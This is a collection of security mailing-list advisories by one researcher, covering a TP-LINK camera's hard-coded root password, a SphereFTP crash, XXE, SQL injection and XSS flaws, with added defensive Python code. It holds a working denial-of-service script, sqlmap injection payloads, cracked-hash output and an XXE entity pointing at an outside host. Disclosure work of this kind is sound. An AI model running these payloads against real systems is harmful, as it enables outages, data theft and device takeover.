[FD] HD Pan/Tilt Wi-Fi Camera NC450 Hard-Coded Credential Vulnerability
*Summary:* The NC450 is your favorable companion that meets home and office surveillance needs, keeping you in touch with what matters most. With its smooth and durable Pan/Tilt of up to 300/110 degrees, you can turn the camera to almost any position you want and watch over a wider area of your home. HD Pan/Tilt Wi-Fi Camera NC450 contains hard-coded credentials within its Linux distribution image. These credentials (root:root) cannot be changed through any normal operation of the camera.

*Vendor:* TP-LINK Technologies Co., Ltd. - http://www.tp-link.us

*Affected Version:* NC450 1.5.0 Build 181022 Rel.3A033D

*Vendor Status* N/A

*Proof Of Concept:*

/home/oit/Desktop/Firmware/_NC450_1.5.0_Build_181022_Rel.3A033D.bin.extracted/jffs2-root
[oit@ubuntu] [10:34] > grep -iRn "root:" .
Binary file ./fs_1/bin/pppd matches
./fs_1/etc/passwd:1:root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:/bin/sh
./fs_1/etc/group:1:root:x:0:

root@kali:~# cat hash.me
root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:/bin/sh
root@kali:~# john hash.me --show
root:root:0:0:Linux User,,,:/home/root:/bin/sh

1 password hash cracked, 0 left

*Credit:* Sachin Wagh (@tiger_tigerboy)

*Reference:*
https://www.tp-link.com/in/home-networking/cloud-camera/nc450/
https://www.tp-link.com/in/support/download/nc450/#Firmware

Best Regards,
*Sachin Wagh*
Security Researcher

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
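The advisory above finds the baked-in root hash by grepping the extracted jffs2 root. The following script, added here as an example and not code from the advisory or from TP-LINK, turns that manual check into a repeatable firmware-audit step: given an extracted root directory it reads etc/passwd and, when present, etc/shadow, and reports every account that ships with a usable password hash, the hash algorithm (md5-crypt, the `$1$` scheme seen in the advisory, is cheap to brute-force offline), whether the account is UID 0, and whether its login shell is interactive. The mini root filesystem it audits is constructed in a temporary directory with made-up hash values so the script runs offline.

```python
"""Audit an extracted firmware root for accounts that ship with a usable password.

Added example, not part of the advisory or the vendor's code. The sample
rootfs (etc/passwd + etc/shadow) is constructed inline; hashes are made up.
"""
import os
import tempfile

LOCKED_MARKERS = {"", "*", "x"}          # "x" = hash lives in shadow (or nowhere)
INTERACTIVE_SHELLS = {"/bin/sh", "/bin/ash", "/bin/bash", "/bin/dash"}
CRYPT_IDS = {"1": "md5-crypt", "5": "sha256-crypt", "6": "sha512-crypt",
             "2a": "bcrypt", "2b": "bcrypt", "y": "yescrypt"}


def parse_colon_file(text):
    """Map user name -> list of fields for passwd/shadow-style files."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            fields = line.split(":")
            entries[fields[0]] = fields
    return entries


def classify_hash(field):
    """Return the hash algorithm name, or None when no password login is possible."""
    if field in LOCKED_MARKERS or field.startswith("!"):   # "!" / "!!" / "!$6$..." = locked
        return None
    if field.startswith("$"):
        ident = field.split("$")[1]
        return CRYPT_IDS.get(ident, "crypt-id-" + ident)
    if len(field) == 13:
        return "des-crypt"
    return "unknown"


def audit_root(root):
    """Return one finding per account in <root>/etc that has a usable password hash."""
    with open(os.path.join(root, "etc", "passwd"), encoding="utf-8") as fh:
        passwd = parse_colon_file(fh.read())
    shadow = {}
    shadow_path = os.path.join(root, "etc", "shadow")
    if os.path.exists(shadow_path):
        with open(shadow_path, encoding="utf-8") as fh:
            shadow = parse_colon_file(fh.read())

    findings = []
    for name, f in passwd.items():
        if len(f) < 7:
            continue                          # malformed line, not a valid account
        hash_field = f[1]
        if hash_field == "x" and name in shadow:
            hash_field = shadow[name][1]      # hash moved to shadow
        algo = classify_hash(hash_field)
        if algo is None:
            continue
        uid = int(f[2]) if f[2].isdigit() else -1
        findings.append({
            "user": name,
            "uid": uid,
            "shell": f[6],
            "hash_algo": algo,
            "root_equivalent": uid == 0,
            "interactive_shell": f[6] in INTERACTIVE_SHELLS,
            # md5-crypt and des-crypt are cheap to brute-force offline, which is
            # what turns a shipped hash into a shipped credential
            "weak_hash": algo in ("md5-crypt", "des-crypt", "unknown"),
        })
    return findings


def build_sample_root():
    """Write a constructed mini rootfs (etc/passwd + etc/shadow) and return its path."""
    root = tempfile.mkdtemp(prefix="fwaudit-")
    os.makedirs(os.path.join(root, "etc"))
    passwd = (
        "root:$1$CONSTRUC$madeUpMd5CryptHashValue00:0:0:Linux User,,,:/home/root:/bin/sh\n"
        "daemon:*:1:1:daemon:/usr/sbin:/bin/false\n"
        "admin:x:1000:1000:admin:/home/admin:/bin/sh\n"
        "nobody:x:65534:65534:nobody:/nonexistent:/bin/false\n"
    )
    shadow = (
        "admin:$6$CONSTRUC$madeUpSha512CryptHashValue:18000:0:99999:7:::\n"
        "nobody:!:18000:0:99999:7:::\n"
    )
    with open(os.path.join(root, "etc", "passwd"), "w", encoding="utf-8") as fh:
        fh.write(passwd)
    with open(os.path.join(root, "etc", "shadow"), "w", encoding="utf-8") as fh:
        fh.write(shadow)
    return root


if __name__ == "__main__":
    for finding in audit_root(build_sample_root()):
        print(finding)
```

Point `audit_root` at the jffs2-root directory from a real extraction to get the same report for an actual image; any finding with `root_equivalent` and `weak_hash` both true is the situation the advisory describes.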
[FD] SphereFTP 2.0 Denial Of Service
#!/usr/bin/python
# Exploit Title: SphereFTP Server v2.0 Remote Denial of Service Vulnerability
# Date: 2019-31-03
# Exploit Author: Sachin Wagh (@tiger_tigerboy)
# Software Link: http://www.menasoft.com/sphereftp/sphereftp_win32_v20.zip
# Tested on: Windows 10 64-bit

import socket
import sys

evil = "A"*3000

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.56.1',21))
s.recv(1024)
s.send('ABOR '+evil+'\r\n')
s.recv(1024)
s.close()
[FD] USB Pratirodh Insecure Password Storage Information Disclosure Vulnerability
Vulnerability Title: USB Pratirodh Insecure Password Storage Information Disclosure Vulnerability
Affected Product: USB resistance
Product Homepage: https://cdac.in/index.aspx?id=cs_eps_usb_pra
CVE-ID : CVE-2017-6911
Severity: Medium

*Description:*
USB Pratirodh is prone to sensitive information disclosure. It stores sensitive information such as the username and password hash in the usb.xml file. An attacker with physical access to the system can modify the file according to his own requirements, which may aid in further attacks.

*Affected Product:* USB resistance

*Credit:* *Sachin Wagh (tiger_tigerboy)*
[FD] USB Pratirodh XML External Entity Injection Vulnerability
Vulnerability Title: USB Pratirodh XML External Entity Injection Vulnerability
Affected Product: USB resistance
Product Homepage: https://cdac.in/index.aspx?id=cs_eps_usb_pra
CVE-ID : CVE-2017-6895
Severity: Medium
Class: Twentieth [CWE-611]
Impact: XML External Entity, Information Disclosure, Denial Of Service
Author: Sachin Wagh (@tiger_tigerboy)

*Description:*
USB Pratirodh is prone to an XML External Entity injection vulnerability. An XXE attack is an attack on an application that parses XML input from untrusted sources using an incorrectly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

Proof of Concept:
Added the below code after the xml tag in the usb.xml file.

** * http://tigerboy.com/XXE <http://tigerboy.com/XXE>" >]>*

*Reference:*
https://secur1tyadvisory.wordpress.com/2017/03/15/usb-pratirodh-xml-external-entity-injection-vulnerability/

*Credit:* *Sachin Wagh (tiger_tigerboy)*
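The advisory's point is that a configuration file the application parses (usb.xml) is writable by someone with physical access, so the parser must not honour external entities. The guard below is an added example, not code from the advisory or from the USB Pratirodh product (the advisory does not say which XML library the product uses): it runs the document through Python's standard-library expat bindings with handlers that fail closed on any DOCTYPE or entity declaration, so the document never reaches a parser that might resolve them. The usb.xml layout (`<usb><user name="..." hash="..."/></usb>`), the samples and the placeholder URL are constructed.

```python
"""Reject DOCTYPE/ENTITY declarations before parsing a config file such as usb.xml.

Added example, not code from the advisory or the product. Python's
ElementTree does not fetch external entities itself, but the guard is
parser-independent: it refuses the declarations an XXE payload needs.
"""
import xml.parsers.expat
from xml.etree import ElementTree as ET


class UnsafeXml(ValueError):
    """Raised when the document carries a DOCTYPE or entity declaration."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    # expat calls this as soon as <!DOCTYPE ...> starts, before the internal
    # subset (where <!ENTITY ...> lives) is read, so nothing is ever expanded.
    raise UnsafeXml("DOCTYPE declaration not allowed in config (%r)" % name)


def _reject_entity(name, is_param, value, base, sysid, pubid, notation):
    # Defence in depth: refuse entity declarations outright as well.
    raise UnsafeXml("entity declaration not allowed in config (%r)" % name)


def parse_config_strict(data):
    """Parse XML from bytes or str, refusing DOCTYPE/ENTITY constructs first.

    Returns the root xml.etree Element; raises UnsafeXml on a hostile document.
    """
    if isinstance(data, str):
        data = data.encode("utf-8")
    guard = xml.parsers.expat.ParserCreate()
    guard.StartDoctypeDeclHandler = _reject_doctype
    guard.EntityDeclHandler = _reject_entity
    guard.Parse(data, True)   # exceptions raised in handlers propagate out of Parse
    return ET.fromstring(data)


def is_safe_document(data):
    """True if the document passes the guard, False if it was rejected."""
    try:
        parse_config_strict(data)
        return True
    except UnsafeXml:
        return False


def load_users(data):
    """Read <user name="..." hash="..."/> entries (assumed layout) into a dict."""
    root = parse_config_strict(data)
    return {u.get("name"): u.get("hash") for u in root.iter("user")}


# Constructed samples: a benign config and one carrying an external entity
# declaration of the kind an XXE payload starts with (placeholder URL only).
BENIGN_XML = (
    '<?xml version="1.0"?>'
    '<usb><user name="admin" hash="CONSTRUCTED_HASH"/></usb>'
)
HOSTILE_XML = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE usb [<!ENTITY ext SYSTEM "http://example.invalid/ext">]>'
    '<usb><user name="&ext;" hash="x"/></usb>'
)

if __name__ == "__main__":
    print("benign users:", load_users(BENIGN_XML))
    print("hostile accepted:", is_safe_document(HOSTILE_XML))
```

A config file legitimately never needs a DOCTYPE, so rejecting the whole construct is simpler and safer than trying to allow "harmless" internal entities; malformed XML still raises `xml.parsers.expat.ExpatError`, which callers should treat as a tampered file as well.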
[FD] WordPress Bulletproof Security Plugin Multiple Cross Site Scripting Vulnerabilities
*Product:* Bulletproof Security
*Exploit Author:* Sachin Wagh
*Affected Version:* 0.53.2
*Fixed Version:* 0.53.3 (http://forum.ait-pro.com/forums/topic/bps-changelog/)
*Home page Link:* https://wordpress.org/plugins/bulletproof-security/

*Detail:*
The Bulletproof Security plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

*Vulnerable Product:*
[+] Bulletproof Security 0.53.2

*Vulnerable Parameter(s):*
[+] bulletproof_security_options_email[bps_send_email_cc]
[+] bulletproof_security_options_email[bps_send_email_bcc]

*Affected Area(s):*
[+] http://localhost/wordpress-4.4/wordpress/wpadmin/admin.php?page=bulletproof-security%2Fadmin%2Flogin%2Flogin.php

*Credit:* Sachin Wagh (@tiger_tigerboy)
[FD] Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities
Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities

Information

Vulnerability Type : Multiple SQL Injection Vulnerabilities
Vendor Homepage: http://www.getsymphony.com/
Vulnerable Version: Symphony CMS 2.6.3
Fixed Version : Symphony CMS 2.6.5
Severity: High
Author – Sachin Wagh (@tiger_tigerboy)

Description

The vulnerability is located in the 'fields[username]', 'action[save]' and 'fields[email]' parameters of the '/symphony/system/authors/new/' page.

Proof of Concept

*1. fields[username] (POST)*

Parameter: fields[username] (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachin[username]=-6697' OR 7462=7462#[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachin[username]=-8105' OR 1 GROUP BY CONCAT(0x71767a7871,(SELECT (CASE WHEN (1004=1004) THEN 1 ELSE 0 END)),0x716b7a6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (comment)
    Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachin[username]=sachin123' OR SLEEP(5)#[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author
---
[14:09:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.12, PHP 5.5.27
back-end DBMS: MySQL 5.0.12

*2. fields[email] (POST)*

Parameter: fields[email] (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachi...@mail.com' AND 4852=4852 AND 'dqXl'='dqXl[username]=sachinnn123[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachi...@mail.com' AND (SELECT 8298 FROM(SELECT COUNT(*),CONCAT(0x71767a7871,(SELECT (ELT( 298=8298,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pmvq'='Pmvq[username]=sachinnn123[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachi...@mail.com' AND (SELECT * FROM (SELECT(SLEEP(5)))xIxY) AND 'hKvH'='hKvH[username]=sachinnn123[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author

*3. action[save] (POST)*

Parameter: action[save] (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachi...@mail.com [username]=sachinnn123[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author%' AND 8836=8836 AND '%'='
---
[12:23:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.12, PHP 5.5.27
back-end DBMS: MySQL 5.0

Vulnerable Product:
[+] Symphony CMS 2.6.3

Vulnerable Parameter(s):
[+] fields[username] (POST)
[+] fields[email] (POST)
[+] action[save] (POST)

Affected Area(s):
[+] http://localhost/symphony2.6.3/symphony-2.6.3/symphony/system/authors/new/

Disclosure Timeline:
Vendor notification: Jan 29, 2016
Public disclosure: Jan 30, 2016

Credits & Authors
====
Sachin Wagh (@tiger_tigerboy)

--
Best Regards,
*Sachin Wagh*
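The sqlmap output above reports boolean-based and error-based injection in the author-creation form. The example below is added here and is not code from Symphony CMS or from the advisory: it models an "is this author e-mail already taken?" lookup in sqlite3, once with the input spliced into the SQL text (the defect class) and once with a bound parameter (the fix), and wraps the two signals sqlmap relies on, a response that flips with an injected condition and a query error on a stray quote, as regression checks a developer can run against the data-access layer after fixing it. The table, the e-mail addresses and the probe strings are constructed; the probe shape `' AND <cond> AND 'dqXl'='dqXl` mirrors the boolean-based payload quoted above, with a condition that is valid in SQLite as well as MySQL.

```python
"""Boolean-based blind SQL injection: the vulnerable lookup beside the fixed one.

Added example, not code from Symphony CMS or the advisory. Runs offline on an
in-memory SQLite database with constructed rows.
"""
import sqlite3


def make_db():
    """In-memory authors table with one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE authors (id INTEGER PRIMARY KEY, email TEXT, username TEXT)")
    conn.execute("INSERT INTO authors (email, username) VALUES (?, ?)",
                 ("author@example.invalid", "author"))
    conn.commit()
    return conn


def email_taken_vulnerable(conn, email):
    """The defect class: user input spliced into the SQL text."""
    sql = "SELECT COUNT(*) FROM authors WHERE email = '%s'" % email
    return conn.execute(sql).fetchone()[0] > 0


def email_taken_safe(conn, email):
    """The fix: the value travels as a bound parameter, never as SQL."""
    sql = "SELECT COUNT(*) FROM authors WHERE email = ?"
    return conn.execute(sql, (email,)).fetchone()[0] > 0


def responds_to_injected_condition(check, conn, email):
    """Boolean-based signal: does the answer flip when a tautology vs. a
    contradiction is appended to an otherwise identical input?

    A correct lookup returns the same answer for both, because the whole
    string is just an e-mail address that does not exist.
    """
    tautology = email + "' AND 1=1 AND 'dqXl'='dqXl"
    contradiction = email + "' AND 1=2 AND 'dqXl'='dqXl"
    return check(conn, tautology) != check(conn, contradiction)


def breaks_on_quote(check, conn):
    """Error-based signal: does a legitimate address containing a quote
    turn into a database error instead of a plain lookup?"""
    try:
        check(conn, "o'brien@example.invalid")
        return False
    except sqlite3.OperationalError:
        return True


def stores_quote_literally(conn):
    """Parameterization keeps real data intact: an address containing a quote
    round-trips without being interpreted as SQL."""
    tricky = "o'brien@example.invalid"
    conn.execute("INSERT INTO authors (email, username) VALUES (?, ?)", (tricky, "obrien"))
    conn.commit()
    return email_taken_safe(conn, tricky)


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", email_taken_vulnerable), ("safe", email_taken_safe)):
        print(name, "flips on injected condition:",
              responds_to_injected_condition(fn, db, "author@example.invalid"))
        print(name, "errors on quote:", breaks_on_quote(fn, db))
    print("safe lookup finds the quoted address:", stores_quote_literally(db))
```

The same two checks apply to any lookup that takes user input: run them against every data-access function touched by the `fields[username]`, `fields[email]` and `action[save]` handlers and the fix is verified without reproducing the full sqlmap run.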
Re: [FD] Symfony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability
Title corrected Symfony CMS to Symphony CMS.

Symphony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability

Information

Vulnerability Type : Cross Site Scripting Vulnerability
Vulnerable Version : 2.6.3
CVE-ID : CVE-2015-8376
Severity: Medium
Author – Sachin Wagh (@tiger_tigerboy)

Description

Symphony CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.

Proof of Concept URL

http://localhost/symphony2.6.3/symphony-2.6.3/symphony/blueprints/sections/edit/1/

Advisory Information:

Symphony CMS XSS Vulnerability

Severity Level:
=
Med

Description:
==

Vulnerable Product:
[+] Symphony CMS 2.6.3

Vulnerable Parameter(s):
[+] Name
[+] Navigation Group
[+] Label

Affected Area(s):
[+] http://localhost/symphony2.6.3/symphony-2.6.3/symphony/blueprints/sections/edit/1/

Advisory Timeline

28-Nov-2015-Reported
6-Dec-2015-Vulnerability Published

Credits & Authors
----
Sachin Wagh (@tiger_tigerboy)

On Sun, Dec 6, 2015 at 8:18 PM, Sachin Wagh <wsachin...@gmail.com> wrote:
>
> Symfony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability
>
> Information
>
> Vulnerability Type : Cross Site Scripting Vulnerability
> Vulnerable Version : 2.6.3
> CVE-ID : CVE-2015-8376
> Severity: Medium
> Author – Sachin Wagh (@tiger_tigerboy)
>
> Description
>
> Symphony CMS is prone to multiple cross-site scripting vulnerabilities
> because it fails to sanitize user-supplied input. An attacker may leverage
> this issue to execute arbitrary script code
> in the browser of an unsuspecting user in the context of the affected site.
>
> Proof of Concept URL
>
> http://localhost/symphony2.6.3/symphony-2.6.3/symphony/blueprints/sections/edit/1/saved/
>
> Advisory Information:
>
> Symphony CMS XSS Vulnerability
>
> Severity Level:
> =
> Med
>
> Description:
> ==
>
> Vulnerable Product:
> [+] Symphony CMS 2.6.3
>
> Vulnerable Parameter(s):
> [+] Name
> [+] Navigation Group
> [+] Label
>
> Affected Area(s):
> [+] http://localhost/symphony2.6.3/symphony-2.6.3/symphony/blueprints/sections/edit/1/
>
> Advisory Timeline
>
> 28-Nov-2015-Reported
> 6-Dec-2015-Vulnerability Published
>
> Credits & Authors
> ----
> Sachin Wagh (@tiger_tigerboy)
>
> --
> Best Regards,
>
> *Sachin Wagh*
> Security Consultant
> m: +91 75 888 644 81
> w: secur1tyadvisory.wordpress.com
>

--
Best Regards,
*Sachin Wagh*
Security Consultant
m: +91 75 888 644 81
w: secur1tyadvisory.wordpress.com
[FD] Symfony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability
Symfony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability

Information

Vulnerability Type : Cross Site Scripting Vulnerability
Vulnerable Version : 2.6.3
CVE-ID : CVE-2015-8376
Severity: Medium
Author – Sachin Wagh (@tiger_tigerboy)

Description

Symphony CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.

Proof of Concept URL

http://localhost/symphony2.6.3/symphony-2.6.3/symphony/blueprints/sections/edit/1/saved/

Advisory Information:

Symphony CMS XSS Vulnerability

Severity Level:
=
Med

Description:
==

Vulnerable Product:
[+] Symphony CMS 2.6.3

Vulnerable Parameter(s):
[+] Name
[+] Navigation Group
[+] Label

Affected Area(s):
[+] http://localhost/symphony2.6.3/symphony-2.6.3/symphony/blueprints/sections/edit/1/

Advisory Timeline

28-Nov-2015-Reported
6-Dec-2015-Vulnerability Published

Credits & Authors
----
Sachin Wagh (@tiger_tigerboy)

--
Best Regards,
*Sachin Wagh*
Security Consultant
m: +91 75 888 644 81
w: secur1tyadvisory.wordpress.com
[FD] PRTG Network Monitor Tool – Multiple Cross-Site Scripting Vulnerability
PRTG Network Monitor Tool – Multiple Cross-Site Scripting Vulnerability

Information

Vulnerability Type : Cross Site Scripting Vulnerability
Vulnerable Version : 15.1.15.2021
Vendor Homepage: http://www.paessler.com/
CVE-ID : 2015-3445
Severity Low : Medium
Author – Sachin Wagh (@tiger_tigerboy)

Description

PRTG Network Monitor Tool is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.

Proof of Concept URL

http://127.0.0.1/error.htm?errormsg=
http://127.0.0.1/group.htm?id=2009=9

Reference

https://secur1tyadvisory.wordpress.com/2015/06/03/prtg-network-monitor-tool-cross-site-scripting-vulnerability/

Advisory Timeline

23-April-2015-Reported
23-April-2015-Vendor Responded
3-Jun-2015-Vendor responded saying 'we are planning to release the fix with our next Stable Version and Released fix for preview version with the Auto Update dialogue'.
3-Jun-2015-Vulnerability Published

Credits & Authors
----
Sachin Wagh (@tiger_tigerboy)

--
Best Regards,
*Sachin Wagh*
Security Consultant
m: +91 75 888 644 81
w: secur1tyadvisory.wordpress.com